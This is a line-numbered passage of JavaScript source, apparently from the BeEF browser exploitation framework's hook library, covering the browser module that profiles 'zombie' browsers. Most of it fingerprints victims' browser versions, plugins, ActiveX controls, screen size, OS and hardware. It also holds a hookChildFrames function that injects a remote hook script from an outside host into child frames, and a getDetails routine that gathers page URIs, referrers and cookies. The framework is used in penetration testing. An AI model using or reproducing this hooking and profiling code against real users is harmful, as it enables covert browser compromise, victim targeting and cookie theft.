3988 FF37: this.isFF37(), // Firefox 37
3989 FF38: this.isFF38(), // Firefox 38
3990 FF39: this.isFF39(), // Firefox 39
3991 FF40: this.isFF40(), // Firefox 40
3992 FF41: this.isFF41(), // Firefox 41
3993 FF42: this.isFF42(), // Firefox 42
3994 FF43: this.isFF43(), // Firefox 43
3995 FF: this.isFF(), // Firefox any version
3996
3997 IE6: this.isIE6(), // Internet Explorer 6
3998 IE7: this.isIE7(), // Internet Explorer 7
3999 IE8: this.isIE8(), // Internet Explorer 8
4000 IE9: this.isIE9(), // Internet Explorer 9
4001 IE10: this.isIE10(), // Internet Explorer 10
4002 IE11: this.isIE11(), // Internet Explorer 11
4003 IE: this.isIE(), // Internet Explorer any version
4004
4005 O9_52: this.isO9_52(), // Opera 9.50 through 9.52
4006 O9_60: this.isO9_60(), // Opera 9.60 through 9.64
4007 O10: this.isO10(), // Opera 10.xx
4008 O11: this.isO11(), // Opera 11.xx
4009 O12: this.isO12(), // Opera 12.xx
4010 O: this.isO(), // Opera any version
4011
4012 S4: this.isS4(), // Safari 4.xx
4013 S5: this.isS5(), // Safari 5.xx
4014 S6: this.isS6(), // Safari 6.x
4015 S7: this.isS7(), // Safari 7.x
4016 S8: this.isS8(), // Safari 8.x
4017 S: this.isS() // Safari any version
4018 }
4019 },
4020
4021 /**
4022 * Returns the type of browser being used.
4023 * @return: {String} User agent software and version.
4024 *
4025 * @example: beef.browser.getBrowserVersion()
4026 */
4027 getBrowserVersion: function () {
4028
4029 if (this.isC5()) {
4030 return '5'
4031 }
4032 ; // Chrome 5
4033 if (this.isC6()) {
4034 return '6'
4035 }
4036 ; // Chrome 6
4037 if (this.isC7()) {
4038 return '7'
4039 }
4040 ; // Chrome 7
4041 if (this.isC8()) {
4042 return '8'
4043 }
4044 ; // Chrome 8
4045 if (this.isC9()) {
4046 return '9'
4047 }
4048 ; // Chrome 9
4049 if (this.isC10()) {
4050 return '10'
4051 }
4052 ; // Chrome 10
4053 if (this.isC11()) {
4054 return '11'
4055 }
4056 ; // Chrome 11
4057 if (this.isC12()) {
4058 return '12'
4059 }
4060 ; // Chrome 12
4061 if (this.isC13()) {
4062 return '13'
4063 }
4064 ; // Chrome 13
4065 if (this.isC14()) {
4066 return '14'
4067 }
4068 ; // Chrome 14
4069 if (this.isC15()) {
4070 return '15'
4071 }
4072 ; // Chrome 15
4073 if (this.isC16()) {
4074 return '16'
4075 }
4076 ; // Chrome 16
4077 if (this.isC17()) {
4078 return '17'
4079 }
4080 ; // Chrome 17
4081 if (this.isC18()) {
4082 return '18'
4083 }
4084 ; // Chrome 18
4085 if (this.isC19()) {
4086 return '19'
4087 }
4088 ; // Chrome 19
4089 if (this.isC19iOS()) {
4090 return '19'
4091 }
4092 ; // Chrome 19 for iOS
4093 if (this.isC20()) {
4094 return '20'
4095 }
4096 ; // Chrome 20
4097 if (this.isC20iOS()) {
4098 return '20'
4099 }
4100 ; // Chrome 20 for iOS
4101 if (this.isC21()) {
4102 return '21'
4103 }
4104 ; // Chrome 21
4105 if (this.isC21iOS()) {
4106 return '21'
4107 }
4108 ; // Chrome 21 for iOS
4109 if (this.isC22()) {
4110 return '22'
4111 }
4112 ; // Chrome 22
4113 if (this.isC22iOS()) {
4114 return '22'
4115 }
4116 ; // Chrome 22 for iOS
4117 if (this.isC23()) {
4118 return '23'
4119 }
4120 ; // Chrome 23
4121 if (this.isC23iOS()) {
4122 return '23'
4123 }
4124 ; // Chrome 23 for iOS
4125 if (this.isC24()) {
4126 return '24'
4127 }
4128 ; // Chrome 24
4129 if (this.isC24iOS()) {
4130 return '24'
4131 }
4132 ; // Chrome 24 for iOS
4133 if (this.isC25()) {
4134 return '25'
4135 }
4136 ; // Chrome 25
4137 if (this.isC25iOS()) {
4138 return '25'
4139 }
4140 ; // Chrome 25 for iOS
4141 if (this.isC26()) {
4142 return '26'
4143 }
4144 ; // Chrome 26
4145 if (this.isC26iOS()) {
4146 return '26'
4147 }
4148 ; // Chrome 26 for iOS
4149 if (this.isC27()) {
4150 return '27'
4151 }
4152 ; // Chrome 27
4153 if (this.isC27iOS()) {
4154 return '27'
4155 }
4156 ; // Chrome 27 for iOS
4157 if (this.isC28()) {
4158 return '28'
4159 }
4160 ; // Chrome 28
4161 if (this.isC28iOS()) {
4162 return '28'
4163 }
4164 ; // Chrome 28 for iOS
4165 if (this.isC29()) {
4166 return '29'
4167 }
4168 ; // Chrome 29
4169 if (this.isC29iOS()) {
4170 return '29'
4171 }
4172 ; // Chrome 29 for iOS
4173 if (this.isC30()) {
4174 return '30'
4175 }
4176 ; // Chrome 30
4177 if (this.isC30iOS()) {
4178 return '30'
4179 }
4180 ; // Chrome 30 for iOS
4181 if (this.isC31()) {
4182 return '31'
4183 }
4184 ; // Chrome 31
4185 if (this.isC31iOS()) {
4186 return '31'
4187 }
4188 ; // Chrome 31 for iOS
4189 if (this.isC32()) {
4190 return '32'
4191 }
4192 ; // Chrome 32
4193 if (this.isC32iOS()) {
4194 return '32'
4195 }
4196 ; // Chrome 32 for iOS
4197 if (this.isC33()) {
4198 return '33'
4199 }
4200 ; // Chrome 33
4201 if (this.isC33iOS()) {
4202 return '33'
4203 }
4204 ; // Chrome 33 for iOS
4205 if (this.isC34()) {
4206 return '34'
4207 }
4208 ; // Chrome 34
4209 if (this.isC34iOS()) {
4210 return '34'
4211 }
4212 ; // Chrome 34 for iOS
4213 if (this.isC35()) {
4214 return '35'
4215 }
4216 ; // Chrome 35
4217 if (this.isC35iOS()) {
4218 return '35'
4219 }
4220 ; // Chrome 35 for iOS
4221 if (this.isC36()) {
4222 return '36'
4223 }
4224 ; // Chrome 36
4225 if (this.isC36iOS()) {
4226 return '36'
4227 }
4228 ; // Chrome 36 for iOS
4229 if (this.isC37()) {
4230 return '37'
4231 }
4232 ; // Chrome 37
4233 if (this.isC37iOS()) {
4234 return '37'
4235 }
4236 ; // Chrome 37 for iOS
4237 if (this.isC38()) {
4238 return '38'
4239 }
4240 ; // Chrome 38
4241 if (this.isC38iOS()) {
4242 return '38'
4243 }
4244 ; // Chrome 38 for iOS
4245 if (this.isC39()) {
4246 return '39'
4247 }
4248 ; // Chrome 39
4249 if (this.isC39iOS()) {
4250 return '39'
4251 }
4252 ; // Chrome 39 for iOS
4253 if (this.isC40()) {
4254 return '40'
4255 }
4256 ; // Chrome 40
4257 if (this.isC40iOS()) {
4258 return '40'
4259 }
4260 ; // Chrome 40 for iOS
4261 if (this.isC41()) {
4262 return '41'
4263 }
4264 ; // Chrome 41
4265 if (this.isC41iOS()) {
4266 return '41'
4267 }
4268 ; // Chrome 41 for iOS
4269 if (this.isC42()) {
4270 return '42'
4271 }
4272 ; // Chrome 42
4273 if (this.isC42iOS()) {
4274 return '42'
4275 }
4276 ; // Chrome 42 for iOS
4277 if (this.isC43()) {
4278 return '43'
4279 }
4280 ; // Chrome 43
4281 if (this.isC43iOS()) {
4282 return '43'
4283 }
4284 ; // Chrome 43 for iOS
4285 if (this.isC44()) {
4286 return '44'
4287 }
4288 ; // Chrome 44
4289 if (this.isC44iOS()) {
4290 return '44'
4291 }
4292 ; // Chrome 44 for iOS
4293 if (this.isC45()) {
4294 return '45'
4295 }
4296 ; // Chrome 45
4297 if (this.isC46()) {
4298 return '46'
4299 }
4300 ;// Chrome 46
4301 if (this.isC47()) {
4302 return '47'
4303 }
4304 ;// Chrome 47
4305 if (this.isC45iOS()) {
4306 return '45'
4307 }
4308 ; // Chrome 45 for iOS
4309
4310 if (this.isFF2()) {
4311 return '2'
4312 }
4313 ; // Firefox 2
4314 if (this.isFF3()) {
4315 return '3'
4316 }
4317 ; // Firefox 3
4318 if (this.isFF3_5()) {
4319 return '3.5'
4320 }
4321 ; // Firefox 3.5
4322 if (this.isFF3_6()) {
4323 return '3.6'
4324 }
4325 ; // Firefox 3.6
4326 if (this.isFF4()) {
4327 return '4'
4328 }
4329 ; // Firefox 4
4330 if (this.isFF5()) {
4331 return '5'
4332 }
4333 ; // Firefox 5
4334 if (this.isFF6()) {
4335 return '6'
4336 }
4337 ; // Firefox 6
4338 if (this.isFF7()) {
4339 return '7'
4340 }
4341 ; // Firefox 7
4342 if (this.isFF8()) {
4343 return '8'
4344 }
4345 ; // Firefox 8
4346 if (this.isFF9()) {
4347 return '9'
4348 }
4349 ; // Firefox 9
4350 if (this.isFF10()) {
4351 return '10'
4352 }
4353 ; // Firefox 10
4354 if (this.isFF11()) {
4355 return '11'
4356 }
4357 ; // Firefox 11
4358 if (this.isFF12()) {
4359 return '12'
4360 }
4361 ; // Firefox 12
4362 if (this.isFF13()) {
4363 return '13'
4364 }
4365 ; // Firefox 13
4366 if (this.isFF14()) {
4367 return '14'
4368 }
4369 ; // Firefox 14
4370 if (this.isFF15()) {
4371 return '15'
4372 }
4373 ; // Firefox 15
4374 if (this.isFF16()) {
4375 return '16'
4376 }
4377 ; // Firefox 16
4378 if (this.isFF17()) {
4379 return '17'
4380 }
4381 ; // Firefox 17
4382 if (this.isFF18()) {
4383 return '18'
4384 }
4385 ; // Firefox 18
4386 if (this.isFF19()) {
4387 return '19'
4388 }
4389 ; // Firefox 19
4390 if (this.isFF20()) {
4391 return '20'
4392 }
4393 ; // Firefox 20
4394 if (this.isFF21()) {
4395 return '21'
4396 }
4397 ; // Firefox 21
4398 if (this.isFF22()) {
4399 return '22'
4400 }
4401 ; // Firefox 22
4402 if (this.isFF23()) {
4403 return '23'
4404 }
4405 ; // Firefox 23
4406 if (this.isFF24()) {
4407 return '24'
4408 }
4409 ; // Firefox 24
4410 if (this.isFF25()) {
4411 return '25'
4412 }
4413 ; // Firefox 25
4414 if (this.isFF26()) {
4415 return '26'
4416 }
4417 ; // Firefox 26
4418 if (this.isFF27()) {
4419 return '27'
4420 }
4421 ; // Firefox 27
4422 if (this.isFF28()) {
4423 return '28'
4424 }
4425 ; // Firefox 28
4426 if (this.isFF29()) {
4427 return '29'
4428 }
4429 ; // Firefox 29
4430 if (this.isFF30()) {
4431 return '30'
4432 }
4433 ; // Firefox 30
4434 if (this.isFF31()) {
4435 return '31'
4436 }
4437 ; // Firefox 31
4438 if (this.isFF32()) {
4439 return '32'
4440 }
4441 ; // Firefox 32
4442 if (this.isFF33()) {
4443 return '33'
4444 }
4445 ; // Firefox 33
4446 if (this.isFF34()) {
4447 return '34'
4448 }
4449 ; // Firefox 34
4450 if (this.isFF35()) {
4451 return '35'
4452 }
4453 ; // Firefox 35
4454 if (this.isFF36()) {
4455 return '36'
4456 }
4457 ; // Firefox 36
4458 if (this.isFF37()) {
4459 return '37'
4460 }
4461 ; // Firefox 37
4462 if (this.isFF38()) {
4463 return '38'
4464 }
4465 ; // Firefox 38
4466 if (this.isFF39()) {
4467 return '39'
4468 }
4469 ; // Firefox 39
4470 if (this.isFF40()) {
4471 return '40'
4472 }
4473 ; // Firefox 40
4474 if (this.isFF41()) {
4475 return '41'
4476 }
4477 ; // Firefox 41
4478 if (this.isFF42()) {
4479 return '42'
4480 }
4481 ; // Firefox 42
4482 if (this.isFF43()) {
4483 return '43'
4484 }
4485 ; // Firefox 43
4486
4487 if (this.isIE6()) {
4488 return '6'
4489 }
4490 ; // Internet Explorer 6
4491 if (this.isIE7()) {
4492 return '7'
4493 }
4494 ; // Internet Explorer 7
4495 if (this.isIE8()) {
4496 return '8'
4497 }
4498 ; // Internet Explorer 8
4499 if (this.isIE9()) {
4500 return '9'
4501 }
4502 ; // Internet Explorer 9
4503 if (this.isIE10()) {
4504 return '10'
4505 }
4506 ; // Internet Explorer 10
4507 if (this.isIE11()) {
4508 return '11'
4509 }
4510 ; // Internet Explorer 11
4511
4512 if (this.isS4()) {
4513 return '4'
4514 }
4515 ; // Safari 4
4516 if (this.isS5()) {
4517 return '5'
4518 }
4519 ; // Safari 5
4520 if (this.isS6()) {
4521 return '6'
4522 }
4523 ; // Safari 6
4524
4525 if (this.isS7()) {
4526 return '7'
4527 }
4528 ; // Safari 7
4529 if (this.isS8()) {
4530 return '8'
4531 }
4532 ; // Safari 8
4533
4534 if (this.isO9_52()) {
4535 return '9.5'
4536 }
4537 ; // Opera 9.5x
4538 if (this.isO9_60()) {
4539 return '9.6'
4540 }
4541 ; // Opera 9.6
4542 if (this.isO10()) {
4543 return '10'
4544 }
4545 ; // Opera 10.xx
4546 if (this.isO11()) {
4547 return '11'
4548 }
4549 ; // Opera 11.xx
4550 if (this.isO12()) {
4551 return '12'
4552 }
4553 ; // Opera 12.xx
4554
4555 return 'UNKNOWN'; // Unknown UA
4556 },
4557
4558 /**
4559 * Returns the type of user agent by hooked browser.
4560 * @return: {String} User agent software.
4561 *
4562 * @example: beef.browser.getBrowserName()
4563 */
4564 getBrowserName: function () {
4565
4566 if (this.isC()) {
4567 return 'C'
4568 }
4569 ; // Chrome any version
4570 if (this.isFF()) {
4571 return 'FF'
4572 }
4573 ; // Firefox any version
4574 if (this.isIE()) {
4575 return 'IE'
4576 }
4577 ; // Internet Explorer any version
4578 if (this.isO()) {
4579 return 'O'
4580 }
4581 ; // Opera any version
4582 if (this.isS()) {
4583 return 'S'
4584 }
4585 ; // Safari any version
4586 return 'UNKNOWN'; // Unknown UA
4587 },
4588
4589 /**
4590 * Hooks all child frames in the current window
4591 * Restricted by same-origin policy
4592 */
4593 hookChildFrames: function () {
4594
4595 // create script object
4596 var script = document.createElement('script');
4597 script.type = 'text/javascript';
4598 script.src = 'https://192.168.11.2:3000/hook.js';
4599
4600 // loop through child frames
4601 for (var i = 0; i < self.frames.length; i++) {
4602 try {
4603 // append hook script
4604 self.frames[i].document.body.appendChild(script);
4605 beef.debug("Hooked child frame [src:" + self.frames[i].window.location.href + "]");
4606 } catch (e) {
4607 // warn on cross-origin
4608 beef.debug("Hooking child frame failed: " + e.message);
4609 }
4610 }
4611 },
4612
4613 /**
4614 * Checks if the zombie has flash installed and enabled.
4615 * @return: {Boolean} true or false.
4616 *
4617 * @example: if(beef.browser.hasFlash()) { ... }
4618 */
4619 hasFlash: function () {
4620 if (!this.type().IE) {
4621 return (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]);
4622 } else {
4623 flash_versions = 12;
4624 flash_installed = false;
4625
4626
4627 if (this.type().IE11) {
4628 flash_installed = (navigator.plugins["Shockwave Flash"] != undefined);
4629 } else {
4630 if (window.ActiveXObject != null) {
4631 for (x = 2; x <= flash_versions; x++) {
4632 try {
4633 Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
4634 if (Flash) {
4635 flash_installed = true;
4636 }
4637 } catch (e) {
4638 beef.debug("Creating Flash ActiveX object failed: " + e.message);
4639 }
4640 }
4641 }
4642 }
4643 return flash_installed;
4644 }
4645 },
4646
4647 /**
4648 * Checks if the zombie has the QuickTime plugin installed.
4649 * @return: {Boolean} true or false.
4650 *
4651 * @example: if ( beef.browser.hasQuickTime() ) { ... }
4652 */
4653 hasQuickTime: function () {
4654
4655 var quicktime = false;
4656
4657 if (this.capabilities()["navigator.plugins"]) {
4658
4659 for (i = 0; i < navigator.plugins.length; i++) {
4660
4661 if (navigator.plugins[i].name.indexOf("QuickTime") >= 0) {
4662 quicktime = true;
4663 }
4664
4665 }
4666
4667 // Has navigator.plugins
4668 } else {
4669
4670 try {
4671
4672 var qt_test = new ActiveXObject('QuickTime.QuickTime');
4673
4674 } catch (e) {
4675 beef.debug("Creating QuickTime ActiveX object failed: " + e.message);
4676 }
4677
4678 if (qt_test) {
4679 quicktime = true;
4680 }
4681
4682 }
4683
4684 return quicktime;
4685
4686 },
4687
4688 /**
4689 * Checks if the zombie has the RealPlayer plugin installed.
4690 * @return: {Boolean} true or false.
4691 *
4692 * @example: if ( beef.browser.hasRealPlayer() ) { ... }
4693 */
4694 hasRealPlayer: function () {
4695
4696 var realplayer = false;
4697
4698 if (this.capabilities()["navigator.plugins"]) {
4699
4700
4701 for (i = 0; i < navigator.plugins.length; i++) {
4702
4703 if (navigator.plugins[i].name.indexOf("RealPlayer") >= 0) {
4704 realplayer = true;
4705 }
4706
4707 }
4708
4709 // has navigator.plugins
4710 } else {
4711
4712 var definedControls = [
4713 'RealPlayer',
4714 'rmocx.RealPlayer G2 Control',
4715 'rmocx.RealPlayer G2 Control.1',
4716 'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
4717 'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
4718 ];
4719
4720 for (var i = 0; i < definedControls.length; i++) {
4721
4722 try {
4723 var rp_test = new ActiveXObject(definedControls[i]);
4724 } catch (e) {
4725 beef.debug("Creating RealPlayer ActiveX object failed: " + e.message);
4726 }
4727
4728 if (rp_test) {
4729 realplayer = true;
4730
4731 }
4732 }
4733 }
4734
4735 return realplayer;
4736
4737 },
4738
4739 /**
4740 * Checks if the zombie has the Windows Media Player plugin installed.
4741 * @return: {Boolean} true or false.
4742 *
4743 * @example: if ( beef.browser.hasWMP() ) { ... }
4744 */
4745 hasWMP: function () {
4746
4747 var wmp = false;
4748
4749 if (this.capabilities()["navigator.plugins"]) {
4750
4751
4752 for (i = 0; i < navigator.plugins.length; i++) {
4753
4754 if (navigator.plugins[i].name.indexOf("Windows Media Player") >= 0) {
4755 wmp = true;
4756 }
4757
4758 }
4759
4760 // Has navigator.plugins
4761 } else {
4762
4763 try {
4764
4765 var wmp_test = new ActiveXObject('WMPlayer.OCX');
4766
4767 } catch (e) {
4768 beef.debug("Creating WMP ActiveX object failed: " + e.message);
4769 }
4770
4771 if (wmp_test) {
4772 wmp = true;
4773 }
4774
4775 }
4776
4777 return wmp;
4778
4779 },
4780
4781 /**
4782 * Checks if VLC is installed
4783 * @return: {Boolean} true or false
4784 **/
4785 hasVLC: function () {
4786 var vlc = false;
4787 if (!this.type().IE) {
4788 for (i = 0; i < navigator.plugins.length; i++) {
4789 if (navigator.plugins[i].name.indexOf("VLC") >= 0) {
4790 vlc = true;
4791 }
4792 }
4793 } else {
4794 try {
4795 control = new ActiveXObject("VideoLAN.VLCPlugin.2");
4796 vlc = true;
4797 } catch (e) {
4798 beef.debug("Creating VLC ActiveX object failed: " + e.message);
4799 }
4800 }
4801 return vlc;
4802 },
4803
4804 /**
4805 * Checks if the zombie has Java enabled.
4806 * @return: {Boolean} true or false.
4807 *
4808 * @example: if(beef.browser.javaEnabled()) { ... }
4809 */
4810 javaEnabled: function () {
4811
4812 return navigator.javaEnabled();
4813
4814 },
4815
4816 /**
4817 * Checks if the Phonegap API is available from the hooked origin.
4818 * @return: {Boolean} true or false.
4819 *
4820 * @example: if(beef.browser.hasPhonegap()) { ... }
4821 */
4822 hasPhonegap: function () {
4823 var result = false;
4824
4825 try {
4826 if (!!device.phonegap || !!device.cordova) result = true; else result = false;
4827 }
4828 catch (e) {
4829 result = false;
4830 }
4831 return result;
4832 },
4833
4834 /**
4835 * Checks if the browser supports CORS
4836 * @return: {Boolean} true or false.
4837 *
4838 * @example: if(beef.browser.hasCors()) { ... }
4839 */
4840 hasCors: function () {
4841 if ('withCredentials' in new XMLHttpRequest())
4842 return true;
4843 else if (typeof XDomainRequest !== "undefined")
4844 return true;
4845 else
4846 return false;
4847 },
4848
4849 /**
4850 * Checks if the zombie has Java installed and enabled.
4851 * @return: {Boolean} true or false.
4852 *
4853 * @example: if(beef.browser.hasJava()) { ... }
4854 */
4855 hasJava: function () {
4856 if (beef.browser.getPlugins().match(/java/i) && beef.browser.javaEnabled()) {
4857 return true;
4858 } else {
4859 return false;
4860 }
4861 },
4862
4863 /**
4864 * Checks if the zombie has VBScript enabled.
4865 * @return: {Boolean} true or false.
4866 *
4867 * @example: if(beef.browser.hasVBScript()) { ... }
4868 */
4869 hasVBScript: function () {
4870 if ((navigator.userAgent.indexOf('MSIE') != -1) && (navigator.userAgent.indexOf('Win') != -1)) {
4871 return true;
4872 } else {
4873 return false;
4874 }
4875 },
4876
4877 /**
4878 * Returns the list of plugins installed in the browser.
4879 */
4880 getPlugins: function () {
4881
4882 var results;
4883 Array.prototype.unique = function () {
4884 var o = {}, i, l = this.length, r = [];
4885 for (i = 0; i < l; i += 1) o[this[i]] = this[i];
4886 for (i in o) r.push(o[i]);
4887 return r;
4888 };
4889
4890 // Things lacking navigator.plugins
4891 if (!this.capabilities()["navigator.plugins"]) this.getPluginsIE();
4892
4893 // All other browsers that support navigator.plugins
4894 else if (navigator.plugins && navigator.plugins.length > 0) {
4895 results = new Array();
4896 for (var i = 0; i < navigator.plugins.length; i++) {
4897
4898 // Firefox returns exact plugin versions
4899 if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version;
4900
4901 // Webkit and Presto (Opera)
4902 // Don't support the version attribute
4903 // Sometimes store the version in description (Real, Adobe)
4904 else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description;
4905 }
4906 results = results.unique().toString();
4907
4908 // All browsers that don't support navigator.plugins
4909 } else {
4910 results = new Array();
4911 //firefox https://bugzilla.mozilla.org/show_bug.cgi?id=757726
4912 // On linux sistem the "version" slot is empty so I'll attach "description" after version
4913 var plugins = {
4914
4915 'AdobeAcrobat': {
4916 'control': 'Adobe Acrobat',
4917 'return': function (control) {
4918 try {
4919 version = navigator.plugins["Adobe Acrobat"]["description"];
4920 return 'Adobe Acrobat Version ' + version; //+ " description "+ filename;
4921
4922 }
4923 catch (e) {
4924 }
4925
4926
4927 }},
4928 'Flash': {
4929 'control': 'Shockwave Flash',
4930 'return': function (control) {
4931 try {
4932 version = navigator.plugins["Shockwave Flash"]["description"];
4933 return 'Flash Player Version ' + version; //+ " description "+ filename;
4934 }
4935
4936 catch (e) {
4937 }
4938 }},
4939 'Google_Talk_Plugin_Accelerator': {
4940 'control': 'Google Talk Plugin Video Accelerator',
4941 'return': function (control) {
4942
4943 try {
4944 version = navigator.plugins['Google Talk Plugin Video Accelerator']["description"];
4945 return 'Google Talk Plugin Video Accelerator Version ' + version; //+ " description "+ filename;
4946 }
4947 catch (e) {
4948 }
4949 }},
4950 'Google_Talk_Plugin': {
4951 'control': 'Google Talk Plugin',
4952 'return': function (control) {
4953 try {
4954 version = navigator.plugins['Google Talk Plugin']["description"];
4955 return 'Google Talk Plugin Version ' + version;// " description "+ filename;
4956 }
4957 catch (e) {
4958 }
4959 }},
4960 'Facebook_Video_Calling_Plugin': {
4961 'control': 'Facebook Video Calling Plugin',
4962 'return': function (control) {
4963 try {
4964 version = navigator.plugins["Facebook Video Calling Plugin"]["description"];
4965 return 'Facebook Video Calling Plugin Version ' + version;//+ " description "+ filename;
4966 }
4967 catch (e) {
4968 }
4969 }},
4970 'Google_Update': {
4971 'control': 'Google Update',
4972 'return': function (control) {
4973 try {
4974 version = navigator.plugins["Google Update"]["description"];
4975 return 'Google Update Version ' + version//+ " description "+ filename;
4976 }
4977 catch (e) {
4978 }
4979 }},
4980 'Windows_Activation_Technologies': {
4981 'control': 'Windows Activation Technologies',
4982 'return': function (control) {
4983 try {
4984 version = navigator.plugins["Windows Activation Technologies"]["description"];
4985 return 'Windows Activation Technologies Version ' + version;//+ " description "+ filename;
4986 }
4987 catch (e) {
4988 }
4989
4990 }},
4991 'VLC_Web_Plugin': {
4992 'control': 'VLC Web Plugin',
4993 'return': function (control) {
4994 try {
4995 version = navigator.plugins["VLC Web Plugin"]["description"];
4996 return 'VLC Web Plugin Version ' + version;//+ " description "+ filename;
4997 }
4998 catch (e) {
4999 }
5000 }},
5001 'Google_Earth_Plugin': {
5002 'control': 'Google Earth Plugin',
5003
5004 'return': function (control) {
5005 try {
5006 version = navigator.plugins['Google Earth Plugin']["description"];
5007 return 'Google Earth Plugin Version ' + version;//+ " description "+ filename;
5008 }
5009 catch (e) {
5010 }
5011 }},
5012 'FoxitReader_Plugin': {
5013 'control': 'FoxitReader Plugin',
5014 'return': function (control) {
5015 try {
5016 version = navigator.plugins['Foxit Reader Plugin for Mozilla']['version'];
5017 return 'FoxitReader Plugin Version ' + version;
5018 } catch (e) {
5019 }
5020 }}
5021 };
5022
5023 var c = 0;
5024 for (var i in plugins) {
5025 //each element od plugins
5026 var control = plugins[i]['control'];
5027 try {
5028 var version = plugins[i]['return'](control);
5029 if (version) {
5030 results[c] = version;
5031 c = c + 1;
5032 }
5033 }
5034 catch (e) {
5035 }
5036
5037 }
5038 }
5039 // Return results
5040 return results;
5041 },
5042
5043 /**
5044 * Returns a list of plugins detected by IE. This is a hack because IE doesn't
5045 * support navigator.plugins
5046 */
5047 getPluginsIE: function () {
5048 var results = '';
5049 var plugins = {'AdobePDF6': {
5050 'control': 'PDF.PdfCtrl',
5051 'return': function (control) {
5052 version = control.getVersions().split(',');
5053 version = version[0].split('=');
5054 return 'Acrobat Reader v' + parseFloat(version[1]);
5055 }},
5056 'AdobePDF7': {
5057 'control': 'AcroPDF.PDF',
5058 'return': function (control) {
5059 version = control.getVersions().split(',');
5060 version = version[0].split('=');
5061 return 'Acrobat Reader v' + parseFloat(version[1]);
5062 }},
5063 'Flash': {
5064 'control': 'ShockwaveFlash.ShockwaveFlash',
5065 'return': function (control) {
5066 version = control.getVariable('$version').substring(4);
5067 return 'Flash Player v' + version.replace(/,/g, ".");
5068 }},
5069 'Quicktime': {
5070 'control': 'QuickTime.QuickTime',
5071 'return': function (control) {
5072 return 'QuickTime Player';
5073 }},
5074 'RealPlayer': {
5075 'control': 'RealPlayer',
5076 'return': function (control) {
5077 version = control.getVersionInfo();
5078 return 'RealPlayer v' + parseFloat(version);
5079 }},
5080 'Shockwave': {
5081 'control': 'SWCtl.SWCtl',
5082 'return': function (control) {
5083 version = control.ShockwaveVersion('').split('r');
5084 return 'Shockwave v' + parseFloat(version[0]);
5085 }},
5086 'WindowsMediaPlayer': {
5087 'control': 'WMPlayer.OCX',
5088 'return': function (control) {
5089 return 'Windows Media Player v' + parseFloat(control.versionInfo);
5090 }},
5091 'FoxitReaderPlugin': {
5092 'control': 'FoxitReader.FoxitReaderCtl.1',
5093 'return': function (control) {
5094 return 'Foxit Reader Plugin v' + parseFloat(control.versionInfo);
5095 }}
5096 };
5097 if (window.ActiveXObject) {
5098 var j = 0;
5099 for (var i in plugins) {
5100 var control = null;
5101 var version = null;
5102 try {
5103 control = new ActiveXObject(plugins[i]['control']);
5104 } catch (e) {
5105 }
5106 if (control) {
5107 if (j != 0)
5108 results += ', ';
5109 results += plugins[i]['return'](control);
5110 j++;
5111 }
5112 }
5113 }
5114 return results;
5115 },
5116
5117 /**
5118 * Returns zombie screen size and color depth.
5119 */
5120 getScreenSize: function () {
5121 return {
5122 width: window.screen.width,
5123 height: window.screen.height,
5124 colordepth: window.screen.colorDepth
5125 }
5126 },
5127
5128 /**
5129 * Returns zombie browser window size.
5130 * @from: http://www.howtocreate.co.uk/tutorials/javascript/browserwindow
5131 */
5132 getWindowSize: function () {
5133 var myWidth = 0, myHeight = 0;
5134 if (typeof( window.innerWidth ) == 'number') {
5135 // Non-IE
5136 myWidth = window.innerWidth;
5137 myHeight = window.innerHeight;
5138 } else if (document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight )) {
5139 // IE 6+ in 'standards compliant mode'
5140 myWidth = document.documentElement.clientWidth;
5141 myHeight = document.documentElement.clientHeight;
5142 } else if (document.body && ( document.body.clientWidth || document.body.clientHeight )) {
5143 // IE 4 compatible
5144 myWidth = document.body.clientWidth;
5145 myHeight = document.body.clientHeight;
5146 }
5147 return {
5148 width: myWidth,
5149 height: myHeight
5150 }
5151 },
5152
5153 /**
5154 * Construct hash from browser details. This function is used to grab the browser details during the hooking process
5155 */
5156 getDetails: function () {
5157 var details = new Array();
5158
5159 var browser_name = beef.browser.getBrowserName();
5160 var browser_version = beef.browser.getBrowserVersion();
5161 var browser_reported_name = beef.browser.getBrowserReportedName();
5162 var browser_language = beef.browser.getBrowserLanguage();
5163 var page_title = (document.title) ? document.title : "Unknown";
5164 var page_uri = (document.location.href) ? document.location.href : "Unknown";
5165 var page_referrer = (document.referrer) ? document.referrer : "Unknown";
5166 var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
5167 switch (document.location.protocol) {
5168 case "http:":
5169 var default_port = "80";
5170 break;
5171 case "https:":
5172 var default_port = "443";
5173 break
5174 default:
5175 var default_port = "";
5176 }
5177 var hostport = (document.location.port) ? document.location.port : default_port;
5178 var browser_plugins = beef.browser.getPlugins();
5179 var date_stamp = new Date().toString();
5180 var os_name = beef.os.getName();
5181 var os_version = beef.os.getVersion();
5182 var default_browser = beef.os.getDefaultBrowser();
5183 var hw_name = beef.hardware.getName();
5184 var cpu_type = beef.hardware.cpuType();
5185 var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
5186 var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
5187 var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
5188 if (value == true) return value; else if (typeof value == 'object') return value; else return;
5189 });
5190 var screen_size = beef.browser.getScreenSize();
5191 var window_size = beef.browser.getWindowSize();
5192 var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
5193 var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
5194 var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
5195 var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
5196 var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
5197 var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
5198 var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
5199 var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
5200 var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
5201 var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
5202 try {
5203 var cookies = document.cookie;
